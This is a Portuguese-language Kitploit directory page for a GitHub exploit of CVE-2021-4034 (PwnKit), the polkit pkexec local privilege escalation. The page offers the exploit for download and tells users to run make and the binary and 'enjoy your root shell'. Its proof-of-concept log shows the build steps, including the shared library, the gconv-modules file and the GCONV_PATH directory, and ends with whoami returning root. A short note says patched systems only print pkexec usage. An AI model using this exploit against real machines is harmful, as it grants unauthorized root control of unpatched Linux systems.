Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/vilasboasph/cve-2021-4034
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoDesenvolvimento de PayloadsExploração de Binários
GitHubvilasboasph/cve-2021-4034

CVE-2021-4034

Exploit para CVE-2021-4034, uma escalada local de privilégios no pkexec do polkit, fornecendo um shell de root via uma biblioteca compartilhada e manipulação do caminho GCONV.

Ver Repositório
1há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-4034

Um dia para o exploit de escalonamento de privilégios do polkit

Basta executar make, ./cve-2021-4034 e aproveitar seu shell de root.

O advisory original dos autores reais está aqui

PoC

Se o exploit estiver funcionando, você obterá um shell de root imediatamente:

root@kitploit:~
localuser@ubuntu-poc:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
localuser@ubuntu-poc:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit

Atualizar o polkit na maioria dos sistemas corrigirá o exploit, portanto você verá o uso e o programa será encerrado:

root@kitploit:~
localuser@ubuntu-poc:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
       --help |
       --disable-internal-agent |
       [--user username] PROGRAM [ARGUMENTS...]

See the pkexec manual page for more details.
localuser@ubuntu-poc:~/CVE-2021-4034$
Baixar ferramenta